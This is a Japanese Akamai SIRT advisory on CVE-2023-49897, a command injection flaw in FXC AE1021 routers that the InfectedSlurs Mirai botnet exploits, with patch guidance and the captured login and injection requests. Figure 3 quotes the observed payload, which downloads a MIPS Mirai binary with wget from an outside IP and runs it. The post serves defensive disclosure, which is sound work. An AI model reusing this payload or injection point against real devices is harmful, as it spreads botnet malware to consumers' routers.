FXC ルーターで活発に悪用される脆弱性:修正済み、パッチが利用可能
このブログ投稿は、SIRT による以前の投稿の更新であり、 InfectedSlurs キャンペーンに関するものです。
エグゼクティブサマリー
Akamai Security Intelligence Response Team(SIRT)は、影響を受けたベンダーの 1 社がパッチ適用済みのファームウェアバージョンとガイダンスを発表したことを受け、InfectedSlurs アドバイザリーシリーズのアップデートを発表しました。
この脆弱性は CVE ID CVE-2023-49897 、CVSS v3 スコア 8.0 です。
対象となるルーターは、ファームウェアバージョン 2.0.9 およびそれ以前の Future X Communications(FXC)AE1021 および AE1021PE コンセント壁埋め込み型ルーターです。
野放しになっているところを捕捉された悪性のペイロードは、Mirai ベースのマルウェアを 分散サービス妨害(DDoS)攻撃 ボットネット構築目的でインストールします。
当社は、 威の痕跡情報(IOC)、Snort ルール、および YARA ルール を独自のリサーチで提供し、野放しになっているこれらの攻撃の試みと、防御側のネットワークにおけるアクティブな感染の可能性を特定するのに役立てました。
知っておくべきこと
SIRT は InfectedSlurs を探索する中で、FXC AE1021 および AE1021PE コンセント壁埋め込み型ルーターに、野放しのまま活発に悪用されている脆弱性を発見しました。このデバイスは、ホテルや家庭用機器向けに作られたコンセントベースの無線 LAN ルーターです。日本では FXC が製造しています。この脆弱性には、CVE ID CVE-2023-49897、CVSS v3 スコア 8.0 が割り当てられています。
この脆弱性により、認証を受けた攻撃者は、管理インターフェースへの POST リクエストを介して配信されるペイロードを使用して、OS コマンドインジェクションを実行することができます。現在の設定では、キャプチャされたペイロードでデバイスのデフォルトの認証情報が使用されています。
影響を受けるファームウェアバージョンは次のとおりです。
AE1021PE ファームウェアバージョン 2.0.9 およびそれ以前
AE1021 ファームウェアバージョン 2.0.9 およびそれ以前
ベンダー(FXC)は、脆弱性を修正するパッチが適用されたバージョンのデバイスのファームウェアをリリースしました。ベンダーは、デバイス所有者にできるだけ早くファームウェアバージョン 2.0.10 へのアップデートを行うよう勧告しています。また、デバイスを工場出荷時の状態にリセットし、初回起動時にデフォルトの管理画面のログインパスワードを変更することも推奨しています。
ベンダーのアドバイザリーは、https://www.fxc.jp/news/20231206 に掲載されています。また、JPCERT によるアドバイザリーも掲載されています https://jvn.jp/en/vu/JVNVU92152057/ (日本語版: https://jvn.jp/vu/JVNVU92152057/)。
観察された攻撃
野生で確認されたペイロードは、Mirai ベースのマルウェアをインストールするものです。このキャンペーンは、DDoS 攻撃を助長することを目的としたボットネットを構築しています。ボットネット自体は、 私たちの最初の投稿で詳細を説明しています。
キャプチャされた攻撃ペイロードは、デバイスによる工場出荷時のデフォルト認証情報の使用に依存しているため、潜在的に侵害可能な、または実際に侵害されているデバイスの数を見積もることは困難です。
攻撃者は認証を得る必要があるため、攻撃者によって生成された 2 つの固有インタラクションが観察されました。これらのインタラクションの最初のものは、単にフィンガープリンティングを試みているに過ぎないと考えています。このインタラクションは、デフォルトの認証情報を使用して /cgi-bin/login.apply エンドポイント URL をターゲットにしています(図 1)。
URL: /cgi-bin/login.apply
Cookie: cookieno=489646; username=[redacted]; password=[redacted]
User-Agent: Go-http-client/1.1
POST BODY:
username_input=[redacted]&password_input=. [redacted]&lang=ja_JP&hashstr=202310281340&username=[redacted]&password=[redacted]
図 1:FXC コンセント壁埋め込み型ルーター認証の試み
認証が成功すると、約 3 秒後に /cgi-bin/action エンドポイント URL に攻撃ペイロードが配信されます(図 2)。
URL:/cgi-bin/action
Cookie: username=[redacted]; password=[redacted]; cookieno=489646
User-Agent: Go-http-client/1.1
POST BODY:
page_suc=i_system_reboot.htm&system.general.datetime=&ntp.general.hostname=[RCE]&ntp.general.dst=0&ntp.general.dst.adjust=0&system.general.timezone=09:00&system.general.tzname=Tokyo&ntp.general.enable=1
図 2:FXC コンセント壁埋め込み型ルーター攻撃の試み
野生の攻撃ペイロードは、OS コマンドインジェクションの脆弱性を利用して、MIPS でコンパイルされた Mirai の亜種を配布しようとします(図 3)。
cd /tmp; rm -rf mips; wget http://45.142.182.96/spl/mips; chmod 777 mips; ./mips accessedge
図 3:野放しで観測されたリモートコード実行ペイロード
また、 最初の発表で、Akamai SIRT チームは、野放しになっている攻撃の試みや、防御側のネットワークにおけるアクティブな感染の可能性を特定するのに役立つ、IOC、Snort のルール、YARA のルールの広範なリストを提供しました。
結論
Internet of Things(IoT)を標的としたキャンペーンでは、日常的に使用されているコンシューマーデバイスが、知らないうちに多くの悪性の行為に加担してしまうケースが後を絶ちません。DDoS ボットネット やクリプトマイニングのスキームは、消費者が自分のデバイスが影響を受けているとまったく気づかない間に起こりうる事態のほんの一部です。場合によっては、ユーザーはこれらのデバイスで認証情報が変更されているかもしれないことすらまったく気づいていないかもしれません。
この事実は、IoT のベストプラクティスと一般消費者が抱える関連リスクに対すて、意識を高め、教育を行う必要性を浮き彫りにしています。このような認識の必要性は、消費者だけにとどまらず、「置いたらすぐ使える」機器を製造しているメーカーにも当てはまります。
基本的なセキュリティ対策の重要性
基本は重要です。 これらの観察結果は、初期設定時にデバイスのデフォルトパスワードを変更するなど、セキュリティ上の基本的なベストプラクティスの重要性を再認識させるものです。 また、潜在的な攻撃から保護するためにシステムを継続的に更新することや、システムやデバイスが奇妙なふるまいをしている場合は特に、随時チェックすることなど、より強力な長期的かつプロアクティブなセキュリティプロトコルを導入することの重要性も強調しています。
今後の情報提供
Akamai Security Intelligence Group は、このような脅威を継続的に監視して報告し、お客様やセキュリティコミュニティ全般の意識向上を促進します。Akamai が実施している調査の最新情報をお求めの場合は、 X (旧 Twitter)で Akamai をフォローしてください。
Akamai SIRT は、CISA、US-CERT、JPCERT、および FXC に対し、コミュニケーション、調整、特定、修復、および情報公開の取り組みを支援していただいたことに深く感謝いたします。
また、 九鬼琉氏、 佐々木貴之氏、吉岡克成氏ら、 横浜国立大学 のメンバーにも感謝申し上げます。彼らと直接一緒に仕事をすることはありませんが、彼らが私たちの報告とほぼ同じ時期に、同じ脆弱性を JPCERT と FXC に報告していたことに着目しました。インターネットをより良く、誰にとっても安全な場所にするために積極的な役割を担っている仲間を見つけるのは、本当に喜ばしいことです。
